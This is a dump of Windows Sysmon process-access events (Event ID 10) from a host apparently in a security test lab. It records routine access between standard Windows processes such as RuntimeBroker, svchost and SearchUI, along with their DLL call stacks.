13:58:35.586{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012184Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.586{59A5CD1D-93F9-6005-F104-00000000A301}45405940C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+5bb0|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000012183Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.586{59A5CD1D-93F9-6005-F104-00000000A301}45405940C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012182Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.586{59A5CD1D-93F9-6005-F104-00000000A301}45405940C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000012181Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.586{59A5CD1D-93F9-6005-F104-00000000A301}45405940C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+5bb0|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000012180Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.586{59A5CD1D-93F9-6005-F104-00000000A301}45405940C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012179Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.586{59A5CD1D-93F9-6005-F104-00000000A301}45405940C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000012178Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.570{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012177Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.570{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012176Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.570{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+18a6c|C:\Windows\SYSTEM32\psmserviceexthost.dll+e44e|C:\Windows\SYSTEM32\psmserviceexthost.dll+e4e7|C:\Windows\SYSTEM32\psmserviceexthost.dll+e1f2|C:\Windows\SYSTEM32\psmserviceexthost.dll+18e38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012175Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.570{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012174Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.570{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012173Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.508{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012172Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.508{59A5CD1D-93F9-6005-F104-00000000A301}45405940C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\shcore.dll+35576|C:\Windows\System32\shcore.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4
.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000012171Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.508{59A5CD1D-93F9-6005-F104-00000000A301}45405940C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\shcore.dll+35576|C:\Windows\System32\shcore.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000012170Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.508{59A5CD1D-93F9-6005-F104-00000000A301}45405940C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\shcore.dll+35576|C:\Windows\System32\shcore.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000012169Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.508{59A5CD1D-93F9-6005-F104-00000000A301}45405956C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+2a2f8d|C:\Windows\System32\Windows.Storage.dll+f5a73|C:\Windows\System32\Windows.Storage.dll+f5aea|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012168Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.492{59A5CD1D-93F9-6005-F104-00000000A301}45405956C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+2ca332|C:\Windows\System32\Windows.Storage.dll+5ed75|C:\Windows\System32\Windows.Storage.dll+f5356|C:\Windows\System32\Windows.Storage.dll+2a2eef|C:\Windows\System32\Windows.Storage.dll+f5a73|C:\Windows\System32\Windows.Storage.dll+f5aea|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506 10341000x800000000000000012167Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.492{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012166Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.476{59A5CD1D-93F9-6005-F104-00000000A301}45405952C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\execmodelclient.dll+f98a|C:\Windows\System32\execmodelclient.dll+f830|C:\Windows\System32\execmodelclient.dll+1e079|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\
Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000012165Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.476{59A5CD1D-93F9-6005-F104-00000000A301}45405952C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\execmodelclient.dll+f98a|C:\Windows\System32\execmodelclient.dll+f8ac|C:\Windows\System32\execmodelclient.dll+1e05b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000012164Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
